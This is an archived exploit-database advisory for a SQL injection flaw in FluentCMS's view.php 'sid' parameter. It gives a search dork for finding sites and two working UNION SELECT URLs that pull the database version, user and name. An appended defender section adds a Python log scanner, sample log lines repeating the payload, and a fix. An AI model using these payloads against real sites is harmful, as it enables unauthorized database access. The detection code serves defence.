FluentCMS view.php sid Remote SQL Injection Vulnerability

2008-04-27T00:00:00
ID EDB-ID:5509
Type exploitdb
Reporter cO2
Modified 2008-04-27T00:00:00

Description

FluentCMS (view.php sid) Remote SQL Injection Vulnerability. CVE-2008-6642. Webapps exploit for php platform

                                        
###################################################
[~] FluentCMS Remote Sql İnj. Vuln.
[~] Founder: cO2 [ Algeria Security Crew ]
[~] HomePage: http://www.DZ-Secure.com
[~] Greatz : To all Hackerz from Algeria & All My Friends . . .
[~] Contact: c02@Hotmail.de
[~] Greetz2 : Str0ke,Inphex,DigitalMind,His0k4,Stack-Terrorist,mArEzZinA,Waraxe,Str0xo
[~] Special thanks to : Inphex
[~] Dork :  Powered by FluentCMS
[~] Exploit :
http://www.xxx.org/view.php?sid=-5926+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,unhex(hex(version())),17,unhex(hex(user())),unhex(hex(database())),20,21,22,23,24,25,26,27,28,29,30,31,32--
or
http://www.xxx.org/view.php?sid=-3+union+select+1,2,3,unhex(hex(user())),5,6,7,unhex(hex(database())),9,10,11,12,13,14,unhex(hex(version())),16--
---------------------
http://www.DZ-Secure.com
---------------------
###############################################

# milw0rm.com [2008-04-27]
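
Added example (not part of the original advisory and not the reporter's code): a defender-side scan of web-server access logs for view.php requests whose sid is not a plain integer, which is the request shape in the URLs above. The log lines are constructed samples; the combined log format, the integer-only sid rule and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate sid is a short non-negative integer.
VALID_SID_RE = re.compile(r"\d{1,10}")
# SQL tokens of the kind seen in the published requests; used only to grade the alert.
SQLI_HINT_RE = re.compile(
    r"\bunion\b.+\bselect\b|\b(?:version|user|database)\s*\(", re.I | re.S
)


def classify_sid(value):
    """Return 'ok', 'suspicious' (not an integer) or 'sqli' (SQL tokens present)."""
    if VALID_SID_RE.fullmatch(value):
        return "ok"
    return "sqli" if SQLI_HINT_RE.search(value) else "suspicious"


def scan(lines):
    """Yield (line_number, verdict, decoded_sid) for view.php requests with a bad sid."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith("/view.php"):
            continue
        # parse_qs decodes %xx and turns '+' into a space, as PHP does for $_GET.
        for value in parse_qs(target.query, keep_blank_values=True).get("sid", []):
            verdict = classify_sid(value.strip())
            if verdict != "ok":
                yield number, verdict, value


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Apr/2008:10:00:01 +0000] "GET /view.php?sid=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [27/Apr/2008:10:00:05 +0000] "GET /view.php?sid=-3+union+select+1,2,3,unhex(hex(user())),5-- HTTP/1.1" 200 4987',
    '198.51.100.7 - - [27/Apr/2008:10:00:09 +0000] "GET /view.php?sid=-3%20UNION%20SELECT%201,2 HTTP/1.1" 200 4801',
    '192.0.2.44 - - [27/Apr/2008:10:01:13 +0000] "GET /view.php?sid=12abc HTTP/1.1" 200 310',
    '192.0.2.10 - - [27/Apr/2008:10:02:00 +0000] "GET /index.php?sid=1+union+select+1 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, verdict, sid in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}: sid={sid!r}")
```

A hit is a triage signal, not proof of compromise. The durable fix is in the application: validate sid as an integer and pass it to the database as a bound parameter.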